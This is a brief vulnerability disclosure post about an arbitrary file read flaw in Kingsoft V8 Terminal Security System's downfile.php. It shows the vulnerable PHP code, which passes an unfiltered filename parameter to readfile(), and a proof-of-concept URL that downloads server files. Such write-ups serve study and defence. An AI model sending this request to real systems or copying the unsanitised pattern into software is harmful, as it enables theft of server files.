Kingsoft V8 Terminal Security System Downfile Php Arbitrary File Reading Vulnerability

Posted Mar 4, 2025

By Rhy0z

1 min read

Kingsoft V8 Terminal Security System downfile.php Arbitrary File Reading Vulnerability

Vulnerability Description

Kingsoft V8 terminal security system There is a vulnerability to read any file on the server. The attacker can download any file on the server through the vulnerability.

Vulnerability Impact

Kingsoft V8 terminal security system

Network surveying and mapping

Vulnerability reappears

Files with vulnerability /Console/htmltopdf/downfile.php

  
<?php	
			$filename= $_GET["filename"];
            
			$filename=iconv("UTF-8","GBK//IGNORE", $filename);

   			header("Cache-Control: public"); 
			header("Content-Description: File Transfer"); 
			header('Content-disposition: attachment; filename='.$filename); //文件名   
			header("Content-Type: application/zip"); //zip格式的   
			header("Content-Transfer-Encoding: binary"); //告诉浏览器，这是二进制文件    
			header('Content-Length: '. filesize($filename)); //告诉浏览器，文件大小   
			@readfile($filename);
			?>

There is no filtering in the file. You can download any file through the filename parameter. The POC is

/htmltopdf/downfile.php?filename=downfile.php

This post is licensed under CC BY 4.0 by the author.